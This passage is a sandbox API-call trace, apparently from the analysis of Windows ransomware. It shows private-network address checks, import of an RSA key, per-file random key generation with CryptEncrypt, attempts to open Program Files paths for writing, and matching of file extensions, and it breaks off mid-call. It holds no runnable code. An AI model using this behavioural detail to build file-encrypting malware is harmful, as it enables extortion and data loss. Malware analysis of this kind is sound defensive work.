[0137.028] inet_ntoa (in=0x100a8c0) returned="192.168.0.1" [0137.028] WSAGetLastError () returned 0 [0137.028] StrStrIA (lpFirst="192.168.0.1", lpSrch="172.") returned 0x0 [0137.028] StrStrIA (lpFirst="192.168.0.1", lpSrch="192.168.") returned="192.168.0.1" [0137.028] StrStrIA (lpFirst="192.168.0.1", lpSrch="10.") returned 0x0 [0137.028] StrStrIA (lpFirst="192.168.0.1", lpSrch="169.") returned 0x0 [0137.028] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc) returned 0xed4d80 [0137.028] inet_ntoa (in=0xff00a8c0) returned="192.168.0.255" [0137.028] WSAGetLastError () returned 0 [0137.028] StrStrIA (lpFirst="192.168.0.255", lpSrch="172.") returned 0x0 [0137.028] StrStrIA (lpFirst="192.168.0.255", lpSrch="192.168.") returned="192.168.0.255" [0137.028] StrStrIA (lpFirst="192.168.0.255", lpSrch="10.") returned 0x0 [0137.028] StrStrIA (lpFirst="192.168.0.255", lpSrch="169.") returned 0x0 [0137.028] inet_ntoa (in=0x160000e0) returned="224.0.0.22" [0137.029] WSAGetLastError () returned 0 [0137.029] StrStrIA (lpFirst="224.0.0.22", lpSrch="172.") returned 0x0 [0137.029] StrStrIA (lpFirst="224.0.0.22", lpSrch="192.168.") returned 0x0 [0137.029] StrStrIA (lpFirst="224.0.0.22", lpSrch="10.") returned 0x0 [0137.029] StrStrIA (lpFirst="224.0.0.22", lpSrch="169.") returned 0x0 [0137.029] inet_ntoa (in=0xfc0000e0) returned="224.0.0.252" [0137.029] WSAGetLastError () returned 0 [0137.029] StrStrIA (lpFirst="224.0.0.252", lpSrch="172.") returned 0x0 [0137.029] StrStrIA (lpFirst="224.0.0.252", lpSrch="192.168.") returned 0x0 [0137.029] StrStrIA (lpFirst="224.0.0.252", lpSrch="10.") returned 0x0 [0137.029] StrStrIA (lpFirst="224.0.0.252", lpSrch="169.") returned 0x0 [0137.029] inet_ntoa (in=0xffffffff) returned="255.255.255.255" [0137.029] WSAGetLastError () returned 0 [0137.029] StrStrIA (lpFirst="255.255.255.255", lpSrch="172.") returned 0x0 [0137.029] StrStrIA (lpFirst="255.255.255.255", lpSrch="192.168.") returned 0x0 [0137.029] StrStrIA (lpFirst="255.255.255.255", lpSrch="10.") returned 0x0 [0137.029] StrStrIA (lpFirst="255.255.255.255", lpSrch="169.") returned 0x0 [0137.029] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed76f8 | out: hHeap=0xea0000) returned 1 [0137.029] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x280f5b0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2b0 [0137.031] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x280fd20, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2b4 [0137.031] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0137.032] PostQueuedCompletionStatus (CompletionPort=0x2ac, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x1, lpOverlapped=0x0) returned 1 [0137.032] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0xb48 [0055.525] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0055.525] VirtualAlloc (lpAddress=0x0, dwSize=0x500040, flAllocationType=0x3000, flProtect=0x4) returned 0x4100000 [0055.526] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0055.526] CryptAcquireContextA (in: phProv=0x373fcf4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x373fcf4*=0xece568) returned 1 [0055.527] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0055.527] CryptImportKey (in: hProv=0xece568, pbData=0x2826098, dwDataLen=0x1000, hPubKey=0x0, dwFlags=0x0, phKey=0x373ff80 | out: phKey=0x373ff80*=0xece4f8) returned 1 [0055.527] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0055.528] LoadLibraryA (lpLibFileName="NTDLL.dll") returned 0x77c40000 [0055.528] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0055.528] LoadLibraryA (lpLibFileName="NTDLL.dll") returned 0x77c40000 [0055.529] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0055.529] Sleep (dwMilliseconds=0x1f4) [0060.624] Sleep (dwMilliseconds=0x1f4) [0069.841] Sleep (dwMilliseconds=0x1f4) [0070.518] Sleep (dwMilliseconds=0x1f4) [0071.042] Sleep (dwMilliseconds=0x1f4) [0071.557] Sleep (dwMilliseconds=0x1f4) [0072.073] Sleep (dwMilliseconds=0x1f4) [0072.723] Sleep (dwMilliseconds=0x1f4) [0076.826] Sleep (dwMilliseconds=0x1f4) [0077.329] Sleep (dwMilliseconds=0x1f4) [0077.844] Sleep (dwMilliseconds=0x1f4) [0078.359] Sleep (dwMilliseconds=0x1f4) [0078.874] Sleep (dwMilliseconds=0x1f4) [0079.389] Sleep (dwMilliseconds=0x1f4) [0079.903] Sleep (dwMilliseconds=0x1f4) [0080.418] Sleep (dwMilliseconds=0x1f4) [0080.933] Sleep (dwMilliseconds=0x1f4) [0081.448] Sleep (dwMilliseconds=0x1f4) [0081.962] Sleep (dwMilliseconds=0x1f4) [0082.477] Sleep (dwMilliseconds=0x1f4) [0083.190] Sleep (dwMilliseconds=0x1f4) [0084.093] Sleep (dwMilliseconds=0x1f4) [0084.627] Sleep (dwMilliseconds=0x1f4) [0085.132] Sleep (dwMilliseconds=0x1f4) [0085.647] Sleep (dwMilliseconds=0x1f4) [0086.221] Sleep (dwMilliseconds=0x1f4) [0086.737] Sleep (dwMilliseconds=0x1f4) [0087.251] Sleep (dwMilliseconds=0x1f4) [0087.766] Sleep (dwMilliseconds=0x1f4) [0088.598] Sleep (dwMilliseconds=0x1f4) [0089.499] Sleep (dwMilliseconds=0x1f4) [0090.047] Sleep (dwMilliseconds=0x1f4) [0090.561] Sleep (dwMilliseconds=0x1f4) [0091.233] Sleep (dwMilliseconds=0x1f4) [0091.753] Sleep (dwMilliseconds=0x1f4) [0092.526] Sleep (dwMilliseconds=0x1f4) [0093.110] Sleep (dwMilliseconds=0x1f4) [0093.644] Sleep (dwMilliseconds=0x1f4) [0094.199] Sleep (dwMilliseconds=0x1f4) [0094.737] Sleep (dwMilliseconds=0x1f4) [0095.238] Sleep (dwMilliseconds=0x1f4) [0095.753] Sleep (dwMilliseconds=0x1f4) [0096.268] Sleep (dwMilliseconds=0x1f4) [0096.799] Sleep (dwMilliseconds=0x1f4) [0097.313] Sleep (dwMilliseconds=0x1f4) [0097.830] Sleep (dwMilliseconds=0x1f4) [0098.358] Sleep (dwMilliseconds=0x1f4) [0098.873] Sleep (dwMilliseconds=0x1f4) [0099.879] Sleep (dwMilliseconds=0x1f4) [0100.423] Sleep (dwMilliseconds=0x1f4) [0100.942] Sleep (dwMilliseconds=0x1f4) [0101.460] Sleep (dwMilliseconds=0x1f4) [0101.995] Sleep (dwMilliseconds=0x1f4) [0102.724] Sleep (dwMilliseconds=0x1f4) [0103.334] Sleep (dwMilliseconds=0x1f4) [0103.870] Sleep (dwMilliseconds=0x1f4) [0104.387] Sleep (dwMilliseconds=0x1f4) [0105.010] Sleep (dwMilliseconds=0x1f4) [0105.558] Sleep (dwMilliseconds=0x1f4) [0106.585] Sleep (dwMilliseconds=0x1f4) [0107.110] Sleep (dwMilliseconds=0x1f4) [0107.734] Sleep (dwMilliseconds=0x1f4) [0108.359] Sleep (dwMilliseconds=0x1f4) [0108.900] Sleep (dwMilliseconds=0x1f4) [0109.403] Sleep (dwMilliseconds=0x1f4) [0110.103] Sleep (dwMilliseconds=0x1f4) [0110.604] Sleep (dwMilliseconds=0x1f4) [0111.337] Sleep (dwMilliseconds=0x1f4) [0111.841] Sleep (dwMilliseconds=0x1f4) [0112.590] Sleep (dwMilliseconds=0x1f4) [0113.124] Sleep (dwMilliseconds=0x1f4) [0113.651] Sleep (dwMilliseconds=0x1f4) [0114.270] Sleep (dwMilliseconds=0x1f4) [0114.798] Sleep (dwMilliseconds=0x1f4) [0115.735] Sleep (dwMilliseconds=0x1f4) [0116.240] Sleep (dwMilliseconds=0x1f4) [0116.878] Sleep (dwMilliseconds=0x1f4) [0117.468] Sleep (dwMilliseconds=0x1f4) [0117.983] Sleep (dwMilliseconds=0x1f4) [0118.498] Sleep (dwMilliseconds=0x1f4) [0119.307] Sleep (dwMilliseconds=0x1f4) [0119.815] Sleep (dwMilliseconds=0x1f4) [0120.735] Sleep (dwMilliseconds=0x1f4) [0121.271] Sleep (dwMilliseconds=0x1f4) [0121.805] Sleep (dwMilliseconds=0x1f4) [0122.493] Sleep (dwMilliseconds=0x1f4) [0123.046] Sleep (dwMilliseconds=0x1f4) [0123.573] Sleep (dwMilliseconds=0x1f4) [0124.083] Sleep (dwMilliseconds=0x1f4) [0124.844] Sleep (dwMilliseconds=0x1f4) [0125.346] Sleep (dwMilliseconds=0x1f4) [0125.861] Sleep (dwMilliseconds=0x1f4) [0126.376] Sleep (dwMilliseconds=0x1f4) [0126.891] Sleep (dwMilliseconds=0x1f4) [0127.543] Sleep (dwMilliseconds=0x1f4) [0128.188] Sleep (dwMilliseconds=0x1f4) [0128.700] Sleep (dwMilliseconds=0x1f4) [0129.215] Sleep (dwMilliseconds=0x1f4) [0129.730] Sleep (dwMilliseconds=0x1f4) [0130.262] Sleep (dwMilliseconds=0x1f4) [0130.779] Sleep (dwMilliseconds=0x1f4) [0131.290] Sleep (dwMilliseconds=0x1f4) [0131.820] Sleep (dwMilliseconds=0x1f4) [0132.349] Sleep (dwMilliseconds=0x1f4) [0133.178] Sleep (dwMilliseconds=0x1f4) [0133.958] Sleep (dwMilliseconds=0x1f4) [0137.002] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0137.002] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0137.002] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0137.003] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Defender" (normalized: "c:\\program files (x86)\\windows defender")) returned 0x10 [0137.003] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Defender" (normalized: "c:\\program files (x86)\\windows defender"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.004] GetLastError () returned 0x5 [0137.004] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0137.004] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d58 | out: hHeap=0xea0000) returned 1 [0137.004] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0137.004] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0137.004] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0137.005] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Mail" (normalized: "c:\\program files (x86)\\windows mail")) returned 0x10 [0137.005] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Mail" (normalized: "c:\\program files (x86)\\windows mail"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.005] GetLastError () returned 0x5 [0137.005] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2bb0 | out: hHeap=0xea0000) returned 1 [0137.005] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d80 | out: hHeap=0xea0000) returned 1 [0137.005] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0137.005] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0137.005] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0137.006] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Media Player" (normalized: "c:\\program files (x86)\\windows media player")) returned 0x10 [0137.006] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player" (normalized: "c:\\program files (x86)\\windows media player"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.006] GetLastError () returned 0x5 [0137.006] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab20 | out: hHeap=0xea0000) returned 1 [0137.006] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6da8 | out: hHeap=0xea0000) returned 1 [0137.006] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0137.006] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0137.007] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0137.007] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows NT" (normalized: "c:\\program files (x86)\\windows nt")) returned 0x10 [0137.007] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT" (normalized: "c:\\program files (x86)\\windows nt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.007] GetLastError () returned 0x5 [0137.008] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2fd0 | out: hHeap=0xea0000) returned 1 [0137.008] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6dd0 | out: hHeap=0xea0000) returned 1 [0137.008] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0137.008] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0137.008] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0137.008] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer" (normalized: "c:\\program files (x86)\\windows photo viewer")) returned 0x10 [0137.009] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer" (normalized: "c:\\program files (x86)\\windows photo viewer"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.009] GetLastError () returned 0x5 [0137.009] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab88 | out: hHeap=0xea0000) returned 1 [0137.009] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6df8 | out: hHeap=0xea0000) returned 1 [0137.009] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0137.009] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0137.009] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0137.010] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Portable Devices" (normalized: "c:\\program files (x86)\\windows portable devices")) returned 0x10 [0137.010] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Portable Devices" (normalized: "c:\\program files (x86)\\windows portable devices"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.010] GetLastError () returned 0x5 [0137.010] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed76f8 | out: hHeap=0xea0000) returned 1 [0137.010] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e20 | out: hHeap=0xea0000) returned 1 [0137.010] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0137.010] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0137.010] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0137.011] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar" (normalized: "c:\\program files (x86)\\windows sidebar")) returned 0x10 [0137.011] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar" (normalized: "c:\\program files (x86)\\windows sidebar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.011] GetLastError () returned 0x5 [0137.011] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2f78 | out: hHeap=0xea0000) returned 1 [0137.011] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e48 | out: hHeap=0xea0000) returned 1 [0137.011] Sleep (dwMilliseconds=0x1f4) [0137.533] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0137.533] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0137.533] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0137.533] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\audiodepthconverter.ax" (normalized: "c:\\program files\\dvd maker\\audiodepthconverter.ax")) returned 0x20 [0137.536] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\audiodepthconverter.ax" (normalized: "c:\\program files\\dvd maker\\audiodepthconverter.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.536] GetLastError () returned 0x5 [0137.536] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee410 | out: hHeap=0xea0000) returned 1 [0137.536] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2b30 | out: hHeap=0xea0000) returned 1 [0137.536] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0137.536] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0137.536] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0137.537] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\directshowtap.ax" (normalized: "c:\\program files\\dvd maker\\directshowtap.ax")) returned 0x20 [0137.537] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\directshowtap.ax" (normalized: "c:\\program files\\dvd maker\\directshowtap.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.537] GetLastError () returned 0x5 [0137.537] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0137.537] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecc70 | out: hHeap=0xea0000) returned 1 [0137.538] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0137.538] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0137.538] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0137.538] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Eurosti.TTF" (normalized: "c:\\program files\\dvd maker\\eurosti.ttf")) returned 0x20 [0137.539] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Eurosti.TTF" (normalized: "c:\\program files\\dvd maker\\eurosti.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.539] GetLastError () returned 0x5 [0137.539] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2cb8 | out: hHeap=0xea0000) returned 1 [0137.539] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeccc0 | out: hHeap=0xea0000) returned 1 [0137.539] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0137.539] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0137.539] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0137.540] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\fieldswitch.ax" (normalized: "c:\\program files\\dvd maker\\fieldswitch.ax")) returned 0x20 [0137.540] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\fieldswitch.ax" (normalized: "c:\\program files\\dvd maker\\fieldswitch.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.541] GetLastError () returned 0x5 [0137.541] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee488 | out: hHeap=0xea0000) returned 1 [0137.541] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecce8 | out: hHeap=0xea0000) returned 1 [0137.541] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0137.541] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0137.541] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0137.541] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\offset.ax" (normalized: "c:\\program files\\dvd maker\\offset.ax")) returned 0x20 [0137.542] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\offset.ax" (normalized: "c:\\program files\\dvd maker\\offset.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.542] GetLastError () returned 0x5 [0137.542] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2dc0 | out: hHeap=0xea0000) returned 1 [0137.542] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd10 | out: hHeap=0xea0000) returned 1 [0137.542] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0137.542] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0137.542] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0137.542] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\rtstreamsink.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsink.ax")) returned 0x20 [0137.549] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\rtstreamsink.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsink.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.549] GetLastError () returned 0x5 [0137.549] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee4f0 | out: hHeap=0xea0000) returned 1 [0137.549] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd38 | out: hHeap=0xea0000) returned 1 [0137.549] Sleep (dwMilliseconds=0x1f4) [0138.062] Sleep (dwMilliseconds=0x1f4) [0139.453] Sleep (dwMilliseconds=0x1f4) [0140.056] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0140.056] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0140.057] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0140.058] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\update-settings.ini")) returned 0x20 [0140.170] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\update-settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6cc [0140.171] GetLastError () returned 0x0 [0140.171] GetFileSizeEx (in: hFile=0x6cc, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=137) returned 1 [0140.171] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".4dd") returned 0x0 [0140.171] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".4dl") returned 0x0 [0140.171] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".accdb") returned 0x0 [0140.171] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".accdc") returned 0x0 [0140.171] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".accde") returned 0x0 [0140.171] StrStrIW (lpFirst="C:\\Program Files 